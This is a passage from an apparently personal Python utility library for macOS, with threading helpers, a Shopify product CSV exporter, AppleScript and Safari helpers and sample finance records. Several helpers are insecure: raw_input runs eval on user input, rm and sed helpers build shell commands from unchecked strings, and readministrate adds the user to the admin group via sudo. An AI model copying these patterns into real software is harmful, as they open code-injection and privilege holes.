elif zilleum == len(args[0]):
# halts for say, args[0] is 11, nodes is 2.
return results
assert 1 == len(set(list(map(len, args))))
""" :Tests:
def x(self = 1, a = True, b = True, c = True):
return 1
a = pool(x) # will yield -1 in event self is supplied to not a truly instantiated object
assert a.result() == 1
def x(y):
return 1
b = pool(x, [1, 2, 3])
assert [1, 1, 1] == b.result()
def x(y, z):
return (y + z)
c = pool(x, [1,2,3], [1,2,3])
assert [2, 4, 6] == c.result()
def x(y, multiplier = 5):
return 1 * multiplier
b = pool(x, [1, 2, 3], multiplier = 5)
assert [5, 5, 5] == b.result()
def x(y, multiplier):
return 1 * multiplier
b = pool(x, [5, 5, 5], multiplier = 5)
assert [5, 5, 5] == b.result()
def x(y, z, multiplier = 5):
return (y + z) * multiplier
c = pool(x, [1, 2, 3], [1, 2, 3], multiplier = 5)
assert [10, 20, 30] == c.result()
def x(y, z, multiplier):
return (y + z) * multiplier
c = pool(x, [1,2,3], [1,2,3], multiplier = 5)
assert [10, 20, 30] == c.result()
def x(y, z, multiplier, multiplier_2):
return (y + z) * multiplier * multiplier_2
c = pool(x, [1,2,3], [1,2,3], multiplier = 5, multiplier_2 = 5)
assert [50, 100, 150] == c.result()
x = lambda: 1
c = pool(x)
assert 1 == c.result()
x = lambda x: 1
c = pool(x, [1,2,3])
assert [1, 1, 1] == c.result()
x = lambda x, y: x + y
c = pool(x, [1,2,3], [1,2,3])
assert [2, 4, 6] == c.result()
x = lambda x, y, multiplier = 5: (x + y) * multiplier
c = pool(x, [1,2,3], [1,2,3], multiplier = 5)
assert [10, 20, 30] == c.result()
x = lambda x, y, multiplier: (x + y) * multiplier
c = pool(x, [1,2,3], [1,2,3], multiplier = 5)
assert [10, 20, 30] == c.result()
x = lambda x, y, multiplier = 5: (x + y) * multiplier
c = pool(x, [1,2,3], [1,2,3])
assert [10, 20, 30] == c.result()
def x(self, a = True, b = True, c = True):
return 1
c = pool(x, [1,2,3])
assert [1, 1, 1] == c.result()
# Find any more issues add the tests here.
# Idea [IGNORE]: Accountable Args meant arguments for which not keywords supplied, and given 0 accountable args, you have only keywords, but if defaults will minus until 0. unless none keywords. then is still 0 accountable args, ie pool(lambda: 1)
# Idea: Actually, the only thing that was different was if clean arguments was 0. so you needed to get a len. to do this. you take co_argcounts which is ALL args+kwargs(?-1), and minus by ALLKWARGS. so all params, minus all kwargs. that leaves all arguments.
# tldr. if 0== ALL PARAMS - ALL KWARGS (== ALL ARGUMENTS , LEN), then, it's pool(lambda: 1), which will work
"""
def popen(cmd):
return Popen(cmd.split(' '),shell=False,stdin=None, stdout=None, stderr=None, close_fds=True)
def popwhere(key, keyequals, dictlist):
[ setitem(g(),"indexes",[]) , [g()["indexes"].append(idx)if(keyequals== (getattr(i,key) if("~~~"!=getattr(i,key,"~~~")) else(i.get(key)) )) else(None) for idx, i in enum(dictlist)] ]
assert len(g()["indexes"]) == 1
dictlist.pop(g()["indexes"].pop())
return dictlist
"""
class Test():
def __init__(self):
self.a = "b"
self.c = "d"
class Test2():
def __init__(self):
self.a = "c"
self.c = "b"
dictlist = [Test(),Test2()]
popwhere("a","b",dictlist)
class Test():
def __init__(self):
self.a = "b"
self.c = "d"
class Test2():
def __init__(self):
self.a = "b"
self.c = "b"
dictlist = [Test(),Test2()]
try:popwhere("a","b",dictlist)
except:print("expected error")
"""
def process(func, *args, start_process=1, **kwargs):
import multiprocessing
process_id = str(generate_one_random_number(20))
while process_id in globals():
process_id = str(generate_one_random_number(20))
globals()[process_id] = "processing"
def new_func(func, *args, **kwargs):
globals()[process_id] = func(*args,**kwargs)
def strand(func, *args, start_process=1, **kwargs):
from threading import Thread
t = Thread(target=func, args=args, kwargs=kwargs)
t.start()if(start_process==1)else(1)
return t
x = strand(new_func, *tuple([func] + list(args)), start_process=start_process, **kwargs)
x.globals = globals
x.process_id = process_id
def result(self):
return self.globals()[self.process_id]
bind3(x, result)
def tmp(self):
while self.is_alive() == True:
time.sleep(1)
return self.globals()[self.process_id]
bind3(x, tmp)
return x
def process_(func, *args, start_process=1, **kwargs):
import multiprocessing
p = multiprocessing.Process(target=func,*args,**kwargs)
if(1==start_process):p.start()
return p
def productcsv(sku_image_dict=None,shop=None,images=None,options=None,variants=None,title=None,product_type=None,tags=None,description=None,):
{'Body (HTML)': 'Cute but funny',
'Handle': 'feel-the-force-decor',
'Image Alt Text': '',
'Image Position': '1',
'Image Src': '',
'Option1 Name': 'Color',
'Option1 Value': 'Black',
'Option2 Name': '',
'Option2 Value': '',
'Option3 Name': '',
'Option3 Value': '',
'Tags': '1, test',
'Title': 'Feel The Force Decor',
'Type': 'test',
'Variant Compare At Price': '14.95',
'Variant Grams': '0',
'Variant Image': '',
'Variant Inventory Qty': '1494',
'Variant Price': '9.95',
'Variant SKU': "['sku-1-193']",
'Vendor': 'Epic Life Shop'}
{
'Gift Card': 'false', #
'Google Shopping / AdWords Grouping': '', #
'Google Shopping / AdWords Labels': '', #
'Google Shopping / Age Group': '', #
'Google Shopping / Condition': '', #
'Google Shopping / Custom Label 0': '', #
'Google Shopping / Custom Label 1': '', #
'Google Shopping / Custom Label 2': '', #
'Google Shopping / Custom Label 3': '', #
'Google Shopping / Custom Label 4': '', #
'Google Shopping / Custom Product': '', #
'Google Shopping / Gender': '', #
'Google Shopping / Google Product Category': '', #
'Google Shopping / MPN': '', #
'Published': 'true', #
'SEO Description': '', #
'SEO Title': '', #
'Variant Barcode': '', #
'Variant Fulfillment Service': 'manual', #
'Variant Inventory Policy': 'deny', #
'Variant Inventory Tracker': 'shopify', #
'Variant Requires Shipping': 'true', #
'Variant Tax Code': '', #
'Variant Taxable': 'true', #
'Variant Weight Unit': 'kg', #
}
"""Handle Option1 Value Option2 Value Option3 Value Variant SKU Variant Grams Variant Inventory Tracker Variant Inventory Qty Variant Inventory Policy Variant Fulfillment Service Variant Price Variant Compare At Price Variant Requires Shipping Variant Taxable Image Src Image Position
Handle Title Body (HTML) Vendor Type Tags Published Option1 Name Option2 Name Option3 Name Image Src Variant Image"""
headers = \
['Handle',
'Title',
'Body (HTML)',
'Vendor',
'Type',
'Tags',
'Published',
'Option1 Name',
'Option1 Value',
'Option2 Name',
'Option2 Value',
'Option3 Name',
'Option3 Value',
'Variant SKU',
'Variant Grams',
'Variant Inventory Tracker',
'Variant Inventory Qty',
'Variant Inventory Policy',
'Variant Fulfillment Service',
'Variant Price',
'Variant Compare At Price',
'Variant Requires Shipping',
'Variant Taxable',
'Variant Barcode',
'Image Src',
'Image Position',
'Image Alt Text',
'Gift Card',
'SEO Title',
'SEO Description',
'Google Shopping / Google Product Category',
'Google Shopping / Gender',
'Google Shopping / Age Group',
'Google Shopping / MPN',
'Google Shopping / AdWords Grouping',
'Google Shopping / AdWords Labels',
'Google Shopping / Condition',
'Google Shopping / Custom Product',
'Google Shopping / Custom Label 0',
'Google Shopping / Custom Label 1',
'Google Shopping / Custom Label 2',
'Google Shopping / Custom Label 3',
'Google Shopping / Custom Label 4',
'Variant Image',
'Variant Weight Unit',
'Variant Tax Code']
x = dictfromkeys(headers, default_value = "")
x.update({"Option1 Name": getitem(key("name",options), 0, ""), "Option2 Name": getitem(key("name",options), 1, ""), "Option3 Name": getitem(key("name",options), 2, ""), "Title": title, "Body (HTML)": description, "Vendor": "", "Type": product_type, "Tags":"", "Published":"true", "Image Src":images[0]["src"], "Gift Card": "false", "Variant Image": images[0]["src"]})
image_position = 0
variants_ = []
for idx, variant in enumerate(variants):
variant_ = dictfromkeys(headers, default_value="")
if idx==0: variant_.update(x)
variant_["Handle"] = "".join(re.findall(r"[0-9a-zA-Z ]",title)).lower().replace(" ","-").replace("--","-").replace("--","-")
variant_["Option1 Value"] = variant.get("option1", "")
variant_["Option2 Value"] = variant.get("option2", "")
variant_["Option3 Value"] = variant.get("option3", "")
variant_["Variant SKU"] = variant.get("sku", "")
variant_["Variant Grams"] = variant.get("weight", "")*100
variant_["Variant Weight Unit"] = "kg"
variant_["Variant Inventory Tracker"] = variant["inventory_management"]
variant_["Variant Inventory Qty"] = variant["inventory_quantity"]
variant_["Variant Inventory Policy"] = variant["inventory_policy"]
variant_["Variant Fulfillment Service"] = "manual"
variant_["Variant Price"] = variant["price"]
variant_["Variant Compare At Price"] = variant["compare_at_price"]
variant_["Variant Requires Shipping"] = "true"
variant_["Variant Taxable"] = "true"
variant_["Image Src"] = images[ sku_image_dict[variant.get("sku")] ]["src"] if sku_image_dict!={} else images[0]["src"]
image_position += 1
variant_["Image Position"] = image_position
variant_["Variant Image"] = images[ sku_image_dict[variant.get("sku")] ]["src"] if sku_image_dict!={} else ""
variants_.append(variant_)
if len(images) > len(variants_):
for idx, image in enumerate(images[ len(variants_): ]):
variant_ = dictfromkeys(headers, default_value="")
variant_["Handle"] = "".join(re.findall(r"[0-9a-zA-Z ]",title)).lower().replace(" ","-").replace("--","-").replace("--","-")
variant_["Image Src"] = image["src"]
image_position += 1
variant_["Image Position"] = image_position
variants_.append(variant_)
fn = homepath("~/tavern/tavern/bag/products_%s.csv" % (generate_one_random_number(10)))
CSV().DictWriteWithHeaders(fn, variants_, headers = headers)
def productgost(x):
GhostProduct().productgost(x)
def randomised(x):
random.shuffle(x)
return x
def rangelen(x):
return range(len(x))
def raw_input(x=None):
return eval(input(""))if(None==x)else(eval(input(x)))
def re_findall_overlaps(regex_string, x):
groups_regex = '(?=(' + regex_string + '))'
print("groups regex: %s" % groups_regex)
matches = re.finditer(groups_regex,x)
results = [match.group(1) for match in matches]
print("%s matches" % len(results))
return results
def re_found_function(x,r,method):
if findall(x,r):
return method(x)
else:
return x
def re_spaces(x):
return re_substitute(x,["\s+"," "]).strip()
def re_substitute(x,y):
return re.sub(y[0],y[1],x)
def re_substitute_function(x,r,method):
found = findall(x,r)
if len(found) == 0: print("No found matches")
print(x)
random_strings = []
multiplier = 10000
for i in lrange(len(found)):
random_strings.append("<<<<<%s>>>>>"%(random.choice(string.ascii_letters)*multiplier))
multiplier = multiplier * 10
for i,j in zip(found,random_strings): x = x.replace(i,j)
y = lmap(lambda i:str(method(i)),found)
for i,j in tcer(list(zip(random_strings,y))): x = x.replace(i,j)
print(x)
return x
def readministrate():
import getpass
os.system("sudo -passwd admin")
os.system("sudo dscl . -append /Groups/admin GroupMembership %s"%(getpass.getuser()))
def rfloat(r1 = 0.2, r2 = 0.7):
return random.uniform(r1, r2)
def rm(address):
subprocess.getoutput("""rm -rf "%s" """%address)
def safarijs(x):
blueprint("Safari -> Advanced -> Show develop menu ; Develop -> Allow JavaScript from Apple Events")
x = 'tell application "Safari" to do JavaScript "%s" in current tab of window 1'%x
fn = ".%s.scpt" % str(generate_one_random_number(10))
blueprint(fn)
open(fn, "w").write(x)
r = subprocess.getoutput("osascript %s"%fn)
os.remove(fn)
return r
"""
x = "window.location.href = 'https://google.com'"
safarijs(x)
"""
def save_default_aceintheholedata():
exec('def x(y, ):\n from decimal import Decimal\n import datetime\n from dateutil.tz import tzoffset\n globals().update(locals())\n fields = key("name", y._meta.fields)\n blueprint("Save(%s, "%(type(y).__name__), end="")\n for i in fields:\n z = getattr(y, i)\n r = None\n import datetime\n if type(z) == str:\n r = \'%s = """%s""", \'%(i, z)\n elif type(z) == datetime.datetime:\n r = \'%s = datetime.datetime(%s, %s, %s, %s, %s, %s, %s), \'%(i, z.year, z.month, z.day, z.hour, z.minute, z.second, z.microsecond)\n elif type(z) == datetime.date:\n r = \'%s = datetime.date(%s, %s, %s), \'%(i, z.year, z.month, z.day, )\n else:\n r = "%s = %s, "%(i, z)\n blueprint(r.replace("\\n", "\\\\n"), end="")\n blueprint(")", end="")\n blueprint("\\n")',globals())
import datetime
from decimal import Decimal
Save(AceInTheHole, id = 408, account = """Chase""", date = datetime.datetime(2019, 4, 29), amount = 10.0, type = """BUSINESS_PAYMENT_GATEWAY_DEPOSITS""", tag = """STRIPE""", description = """STRIPE""", )
Save(AceInTheHoleType, id = 18, name = """BUSINESS_OTHER_CONTRACT_LABOR""", )
Save(AceInTheHoleType, id = 19, name = """BUSINESS_OTHER_HOSTING""", )
Save(AceInTheHoleType, id = 20, name = """BUSINESS_OTHER_SUBSCRIPTIONS""", )
Save(AceInTheHoleType, id = 14, name = """BUSINESS_PAYMENT_GATEWAY_DEPOSITS""", )
Save(AceInTheHoleType, id = 15, name = """BUSINESS_PAYMENT_GATEWAY_WITHDRAWALS""", )
Save(AceInTheHoleType, id = 17, name = """BUSINESS_PURCHASING_ADS""", )
Save(AceInTheHoleType, id = 16, name = """BUSINESS_PURCHASING_PRODUCTS""", )
Save(AceInTheHoleType, id = 22, name = """PERSONAL_FOOD""", )
Save(AceInTheHoleType, id = 21, name = """PERSONAL_NOT_FOOD""", )
Save(AceInTheHoleTypeTag, id = 12, type = """BUSINESS_PURCHASING_PRODUCTS""", tag = """Ali""", sign = """negative""", )
Save(AceInTheHoleTypeTag, id = 13, type = """BUSINESS_PAYMENT_GATEWAY_DEPOSITS""", tag = """Stripe Deposit""", sign = """positive""", )
Save(AceInTheHoleTypeTag, id = 29, type = """PERSONAL_NOT_FOOD""", tag = """METROCARD""", sign = """negative""", )
Save(AceInTheHoleTypeTag, id = 30, type = """PERSONAL_NOT_FOOD""", tag = """ATM FEE""", sign = """negative""", )
def savepickles(*args,**kws):
pickle.dump([i for i in args if type(i)!=str][0],open([i for i in args if type(i)==str][0],'wb'))
ifdo(lambda:kws.get('copypickles'),lambda:savepickles(args[0],kws['copypickles']))
return args[0]
def saveobj(x):
import _pickle
import pickle
import dill
return dill.dumps(x)
def sch(x):
from spellchecker import SpellChecker as sch
sch = sch()
a = list(set(re.findall("[\w']+",x)))
b = pool(lambda i: sch.correction(i), a).result()
e = dict(zip(a,b))
c = [i for i in a if i not in b]
distinct_print(c)
for i in c:
while True:
print("+1",i)
d=tryreturn(lambda:next(re.finditer("""[^\w'](%s)(?:[^\w']|$)"""%(i),x)))
if d:
blueprint(x)
x = "".join([x[:d.start()],x[d.start():d.start()+1],e[i],(x[d.end()-1:d.end()])if(x[d.end()-1:d.end()]==" ")else(" "),x[d.end():]])
greenprint(x)
else:
break
x = x.upper()
return x
"""
x = '''hello,
ths is col
hllo.
bye\tyes4 123
'''
"""
def screenshot(address=None):
if address == None:
os.makedirs(homepath("~/tavern/tavern/soda/dls"), exist_ok = True)
address = homepath("~/tavern/tavern/soda/dls/%s.png"%(random.randrange(9999999999999)))
magentaprint("generated address: %s" % address)
greenprint("saving to address: %s" % address)
os.system("""screencapture -x "{}" """.format(address))
return address
def sedremoveline(file,line_numbers):
os.system("""sed -i "" -e "%sd" '%s'"""%((",".join(lmap(str,line_numbers))),file))
"""
os.system('''echo -e "line1\nline2\nline3\nx" > infile''')
sedremoveline("infile",[1,2])
assert open("infile").read() == 'line3\nx\n'
rm("infile")
"""
def setadd(x,y):
if y not in x:
x.add(y)
return x
def setattrs(x, *args, **kwargs):
from types import MethodType,ModuleType,FunctionType
for a,b in kwargs.items():
setattr(x,a,b)
for a,b in zip(args[0::2],args[1::2]):
if type(b) == FunctionType or type(b) == MethodType:
b = tryreturn(lambda: b())
setattr(x,a,b)
"""
a = AD()
setattrs(a,"x",2,"y",3,"z",4)
"""
def setfrom(x, *args):
return [i(x) for i in args]
"""
setfrom(1, lambda i: i, lambda i: i)
"""
def setitem(x, k, v):
x[k] = v
def setitems(x,*args):
for i,j in zip(args[0::2],args[1::2]):
x[i] = j
def show_in_list(a,b):
a = copy.deepcopy(a)
b = copy.deepcopy(b)
x = []
for i in a:
if i in b:
x.append(i)
b.__delitem__(b.index(i))
return x
"""
assert show_in_list([1,2,3,4],[1,2]) == [1,2]
assert show_in_list([10,10],[10]) == [10]
assert show_in_list([10,10],[10,11]) == [10]
"""
def show_overhead(a, b):
# assert len(oset(a)) == len(a)
# assert len(oset(b)) == len(b)
a = copy.deepcopy(a)
b = copy.deepcopy(b)
x = []
for i in a:
if i not in b:
x.append(i)
elif i in b:
b.__delitem__(b.index(i))
return x
"""
show_overhead([1,2,3,4],[1,2])
show_overhead([10,10],[10])
"""
def shuffled(x):
if type(x) is str:
x = list(x)
random.shuffle(x)
return x
else:
x = list(x)
random.shuffle(x)
return x
return x
def shutil_move(a, b):
import shutil
shutil.move(a, b)
def similar(a, b):
from difflib import SequenceMatcher
return SequenceMatcher(None, a, b).ratio()
def slank(key,dict_):
return dict_.pop(key)
def slow_url(x):
return x.split("?")[0]
def sorted_list_matching(x,y):
z = lmap(lambda i:None,x)
for i in x:
index = y.index(i)
z[index] = i
return z
"""
a = [2,1,3]
b = [1,2,3]
sorted_list_matching(a,b)
"""
def sorted_set(x):
return list(sorted(list(set(x))))
def soupy(soup,x=None,y=None,z=None):
import bs4
if type(soup) != bs4.BeautifulSoup: soup = BeautifulSoup(soup)
if x==None: return soup
return(soup.findAll(x)if(None==y==z)else(soup.findAll(x,attrs={y:z})))
def sql_get_multiple_primary_keys(x):
with open(__file__,"r") as f:
return [i.strip().split("=")[0].strip() for i in re.findall(r"(?s)(class %s\(Worksheet\):.*?)class"%x.__name__,f.read())[0].strip().split("\n") if((-1!=i.find("AutoField()"))or(-1!=i.find("unique=True"))or(-1!=i.find("primary_key=True")) )]
def sqltroubleshoot():
os.system("""rm /usr/local/etc/my.cnf && echo "Removed mysql cnf file." sleep 5 && echo "Stopping mysql." && sleep 5 && brew services stop mysql & sleep 5 && mysqld & sleep 5 && echo "Running py2_file again to set up mysql cnf file." && sleep 5 && cd ~/tavern/tavern/soda && /usr/bin/python -B -c "from py2_file import *; Setter_Upper().m15__17_initiate_install_mysql__and__create_database_soda()" ;""")
def strand(func, *args, **kwargs):
from threading import Thread
t = Thread(target=func, args=args, kwargs=kwargs)
t.start()
return t
def strands(func, x, c=32, *args, **kwargs):
for idx, i in enumerate(array_split(x, c)):
stuff = []
for j in i:
stuff.append(strand(func, j, *args, **kwargs))
for s in stuff:
s.join()
print("%s out of %s at %s per done for %s"%(idx, (len(x)/c), c, func.__name__))
def strcls(x,**kwargs):
return type("a",(str,),kwargs)(x)
"""
r = intcls("asdf",print = lambda self:print(self))
r.print()
"""
def sud(dictlist, key):
if type(dictlist) is str:
dictlist2 = dictlist
dictlist = key
key = dictlist2
try: return [getattr(i, key) for i in list(dictlist)]
except: return [i[key] for i in list(dictlist)]
def sudby(x,y):
return or_list(lambda:[i for i in y if x(i)],lambda:[i for i in y if x(*i)],[])
def sudcall(key, dictlist, *args, **kwargs):
try: return [getattr(i, key)(*args, **kwargs) for i in list(dictlist)]
except: return [i[key](*args, **kwargs) for i in list(dictlist)]
def sudsort(key, dictlist, tcer=True):
import operator
if type(key) is not list:
key = [key]
try: return sorted(list(dictlist), key=operator.itemgetter(*key), reverse=tcer)
except: return sorted(list(dictlist), key=operator.attrgetter(*key), reverse=tcer)
def sudsort_multi(columns, items, tcer=False):
from operator import itemgetter, attrgetter
from functools import cmp_to_key
comparers = None
if tryprocess(lambda:items[0].get(columns[0])): comparers = [((itemgetter(col[1:].strip()), -1) if col.startswith('-') else (itemgetter(col.strip()), 1)) for col in columns]
else: comparers = [((attrgetter(col[1:].strip()), -1) if col.startswith('-') else (attrgetter(col.strip()), 1)) for col in columns]
def comparer(left, right):
def cmp(a, b):
if a == None and b == None: return 0
if a == None and b != None: return 1
if a != None and b == None: return -1
elif a != None and b != None: return (a > b) - (a < b)
comparer_iter = ( cmp(fn(left), fn(right)) * mult for fn, mult in comparers)
return next((result for result in comparer_iter if result), 0)
return sorted(list(items), key=cmp_to_key(comparer), reverse=tcer)
def swamp(*args):
a, b = args[0], args[1]
for x, y in zip(a, b):
if y() == True:
return x()
"""
a, b, c = 1,0,0
(1)if(a==True)else(2)if(b==True)else(3)if(c==True)else()
a, b, c = 0,1,0
(1)if(a==True)else(2)if(b==True)else(3)if(c==True)else()
a, b, c = 0,0,1
(1)if(a==True)else(2)if(b==True)else(3)if(c==True)else()
swamp(lambda: a==True, lambda: b==True, lambda: c==True, lambda: 1, lambda: 2, lambda: 3)
def ard():
print(d)
def r():
a = 1
b = 0; c= 0; d=5
swamp(lambda: a==True, lambda: b==True, lambda: c==ard(), lambda: 1, lambda: 2, lambda: 3)
(1)if(a==True)else(2)if(b==True)else(3)if(c==ard())else()
"""
def sys_exit():
[exec("import sys",globals()), sys.exit()]
def tcer(x,a=0):
return reversed(x)if(a==0)else(list(reversed(x)))
def text_to_docx(text, filename):
from docx import Document
document = Document()
paragraph = document.add_paragraph(text)
from docx.shared import Pt
style = document.styles["Normal"]; document.styles["Normal"].font.name = "Times New Roman"; document.styles["Normal"].font.size = Pt(4);
paragraph.style = document.styles["Normal"]
document.save(filename)
def text_to_image(text):
from PIL import Image, ImageDraw, ImageFont
if text == "":
text = "\n"
img = Image.new('RGB', (1800, 540), color = (255, 255, 255))
fnt = ImageFont.truetype("/Library/Fonts/Times New Roman.ttf", 20)
d = ImageDraw.Draw(img)
d.text((0,0), text, font=fnt, fill=(0, 0, 0))
font_size = d.textsize(text, fnt)
img = Image.new('RGB', font_size, color = (255, 255, 255))
fnt = ImageFont.truetype("/Library/Fonts/Times New Roman.ttf", 20)
d = ImageDraw.Draw(img)
d.text((0,0), text, font=fnt, fill=(0, 0, 0))
address = get_random_address(homepath("~/tavern/tavern/soda/dls")).png()
img.save(address)
impreview(address)
os.remove(address)
def textplot(L,a,b):
def divs(x,c):
return [int(x/c)*i for i in range(c+1)]
Q=divs(a,b) + [max(L)]
def slot_file(L,x):
r = []
for idx, i in enum(x[:-1]):
r.append(["%s-%s"%(i,x[idx+1]),len(sorted([a for a in L if a>i and a<=x[idx+1]]))])
return r
slot_file(L,Q)
data= slot_file(L,Q)
max_value = max(count for _, count in data)
increment = max_value / 25
longest_label_length = max(len(label) for label, _ in data)
O = []
for label, count in data:
bar_chunks, remainder = divmod(int(count * 8 / increment), 8)
bar = '█' * bar_chunks
if remainder > 0:
bar += chr(ord('█') + (8 - remainder))
bar = bar or '▏'
O.append(bar+ " " + "(%s(%s))"%(str(label.rjust(longest_label_length).strip()),"%sCount"%(str(round(count,4)))) )
O = ("\n".join(O))
drkprint(O)
return O
def timed(r,x):
m = datetime.now()
R = process(r)
while True:
l = datetime.now()
if (l-m).seconds >=x and R.is_alive() == True:
drkprint("timed out at %s seconds, returning None"%(x))
return None
elif (l-m).seconds <x and R.is_alive() == False:
drkprint("timed in at %s seconds, "%(x))
break
return R.result()
def timed_input(prompt, x=10):
import select
cyanprint(prompt, end="")
sys.stdout.flush()
i,o,e = select.select([sys.stdin],[],[],x)
if (i):
response = sys.stdin.readline().strip()
print("You said %s" % response)
return response
else:
print("response [None]")
return None
def thread(f, x, c=32):
from multiprocessing.dummy import Pool
pool = Pool(c)
payload = pool.map(f, x)
pool.close()
pool.join()
return payload
def time_a_download(method, arg=None):
import time
current = get_dircount()
command = None
if arg:
command = 'method(%s)'%arg
else:
command = 'method()'
exec(command)
while get_dircount() == current and '.part' not in get_latest_download():
time.sleep(0.05)
time.sleep(5)
return get_latest_download()
def timeit(func):
def wrapper(*arg, **kw):
t1 = time.time()
res = func(*arg, **kw)
t2 = time.time()
print("timeit: %s, %s"%((t2 - t1), func.__name__))
return res
return wrapper
def timedretry(x,y):
z = multiprocessing_process(x)
time.sleep(y)
if z.is_alive():
z.terminate()
return timedretry(x,y)
else:
return
def timedtask(func):
def wrapper(*arg, **kw):
t1 = time.time()
start_datetime = datetime.now()
new = Timedtask()
new.function_name = func.__name__
existants = Filter(Timedtask,function_name=new.function_name)
zellums = key("elapsed",existants)
stis = (sum(zellums)/len(zellums))
redprint("stis")
roundulo = int(stis/100)
def sleeperman():
for sleeptime in range(roundulo):
lox = "█"*i
sys.stdout.write(lox)
sys.stdout.flush()
time.sleep(sleeptime)
import multiprocessing
p = multiprocessing.Process(target=sleeperman)
p.start()
res = pool(func, *args, **kw)
p.terminate()
sys.stdout.write(("█"*10)+" %100")
res = res[0]
t2 = time.time()
end_datetime = datetime.now()
elapsed_time = (end_datetime - start_datetime).seconds
print("elapsed: time: %s" % elapsed_time)
print("timeit: %s, %s"%((t2 - t1), func.__name__))
new.start = start_datetime
new.end = end_datetime
new.elapsed_time = elapsed_time
new.my_time_elapsed = (1.1574074074074073e-05) * elapsed_time
new.my_time_start = Date().myDatetimenow(start_datetime)
new.my_time_end = Date().myDatetimenow(end_datetime)
new.save()
distinct_print(ordered_json_dumps(new.__dict__))
return res
return wrapper
def timer(t, func, *args, **kwargs):
t = Timer(t, func, args=args, kwargs=kwargs)
t.start()
return t
def timestamp(x,forward=True):
if forward == True:
timestamp = datetime.timestamp(x)
return timestamp
elif forward == False:
datetime_ = datetime.fromtimestamp(x)
return datetime_
def tinyurl(url):
return requests.get("http://tinyurl.com/api-create.php?url=%s"%(url)).text
def tp(func, *args, ep=0, error = None, **kwargs):
import multiprocessing
t = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
#t = multiprocessing.Process(target=func)#, args=args, kwargs=kwargs)
try:
t.run()
return 1
except Exception as e:
#OSA.notify("%s, %s, %s" % (str(func), str(args), str(kwargs)))
#OSA.notify("tryprocess: " + str(e))
#pyperclip.copy(str(e))
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
def tr(func, *args, ep=0, error = None, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
def transfer_bash():
os.system("""rm ~/tavern/tavern/soda/bash_profile; cp -r ~/.bash_profile ~/tavern/tavern/soda/bash_profile""")
def transfer_workflows():
[os.system("rm -rf /Users/$USER/tavern/tavern/soda/*.workflow"),[os.system("cp -r ~/Library/Services/%s ~/tavern/tavern/soda/%s"%(i,i)) for i in os.listdir(homepath("~/Library/Services")) if i.endswith(".workflow")]]
def transpose(x):
import numpy as np
x = np.transpose(x)
x = [list(i) for i in x]
return x
"""
x = [[1,2],
[1,2]]
greenprint(transpose(x))
"""
def trykeycall(key, dictlist, *args, **kwargs):
try: return [tryprocess(getattr(i, key), *args, **kwargs) for i in list(dictlist)]
except: return [tryprocess(i[key], *args, **kwargs) for i in list(dictlist)]
def trylmap(f, x, *args, **kwargs):
Q = []
for i in x:
Z = tryprocess(f, i, *args, **kwargs)
Q.append(Z)
return Q
def tryprocess(func, *args, ep=0, error = None, **kwargs):
import multiprocessing
t = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
#t = multiprocessing.Process(target=func)#, args=args, kwargs=kwargs)
try:
t.run()
return 1
except Exception as e:
#OSA.notify("%s, %s, %s" % (str(func), str(args), str(kwargs)))
#OSA.notify("tryprocess: " + str(e))
#pyperclip.copy(str(e))
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
def tryreturn(func, *args, ep=0, error = None, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
OSA.log(str(or_list(error,e)))if(1==ep or error)else(1)
return 0
def typecls(x,**kwargs):
return type("a",(int,),kwargs)(x) if type(x)==int else(
type("a",(str,),kwargs)(x)) if type(x)==str else(
type("a",(list,),kwargs)(x)) if type(x)==list else(
type("a",(float,),kwargs)(x)) if type(x)==float else(
type("a",(Time,),kwargs)(x)) if type(x)==datetime else(
type("a",(dict,),kwargs)(x)) if type(x)==dict else()
def uli(x,y,z=-1):
return x.split(y,z)
def unpack_archive(address):
import shutil
import zipfile
shutil.unpack_archive(address, "%s.zip"%address)if(os.path.isdir(address))else(zipfile.ZipFile(address,"r").extractall(os.getcwd()))
def update(x,**kwargs):
lmap(lambda k,v: setitem(x,k,v), list(kwargs.items()))
return x
"""
assert update({"a":"b"},e=5) == {'a': 'b', 'e': 5}
"""
def urlopenproduct(product,url):
[pyperclip.copy(url%(product.handle)), OSA.log("Press OK"), OSA("Google Chrome 70",["ctrl_t","ctrl_l","ctrl_v","return"])]
def valuelist(x):
return {a:b for a,b in x}
"""
valuelist([(1,2), (2,3), (3,4)])
"""
def varsave(x):
'def varsave(x):\n image_ids = key("image_id", x.variants)\n first_save = apilimitcall(x.save)\n assert first_save == True\n image_ids_after_save = key("image_id", x.variants)\n if image_ids_after_save != image_ids:\n for a, b in zip(x.variants, image_ids):\n a.image_id = b\n pool(lambda i: apilimitcall(i.save), x.variants, nodes=4).result()\n if len(x.variants) > 50:\n time.sleep(0.2)\n return x'
image_ids = key("image_id", x.variants)
first_save = apilimitcall(x.save)
assert first_save == True
image_ids_after_save = key("image_id", x.variants)
if image_ids_after_save != image_ids:
for a, b in zip(x.variants, image_ids):
a.image_id = b
image_ids_x = oset(sud("image_id",x.variants))
new = dictfromkeys(image_ids_x,[])
for a, b in new.items():
new[a] = sud("id",filter(x.variants,image_id=a))
for a, b in new.items():
y = filter(x.images,id=a)[0]
y.variant_ids = new[a]
x.save()
# pool(lambda i: apilimitcall(i.save), x.variants, nodes=6).result()
# if len(x.variants) > 50:
# time.sleep(0.2)
return x
def versioncheck(x,z=None):
exec("import selenium; bprint(selenium.__version__); y = selenium.__version__",globals())
if z:os.system("pip install %s==%s"%(x,z))
return y
def viden(x,*args):
print(args)
for i,j in zipeven(args[0::2],args[1::2],None):
if j == None:
x = x.split(i)
else:
x = x.split(i)[j]
return x
"""
viden("asdfa","a",1)
"""
def wall(i):
return ceil(i)if((i)%1>=0.5)else(floor(i))
def word_multiply(l1,l2):
x = []
for i in l1:
for j in l2:
x.append([i,j])
x.append([j,i])
return x
def wordcount(x):
apostrophes = x.count("'")
words = len(x.split(" "))
count = apostrophes + words
return count
def writew(x,y):
open(x,"w").write(y)
return x
def writewb(x,y):
open(x,"wb").write(y)
return x
def write_xlsx_cell(cell,x,wb=None,save=False):
ws = None
if globe("workbook"):
wb = globe("workbook")
ws = wb.worksheets[0]
else:
import openpyxl
wb = ifelseget(lambda:os.path.exists(wb),lambda:openpyxl.load_workbook(wb),lambda:openpyxl.Workbook())
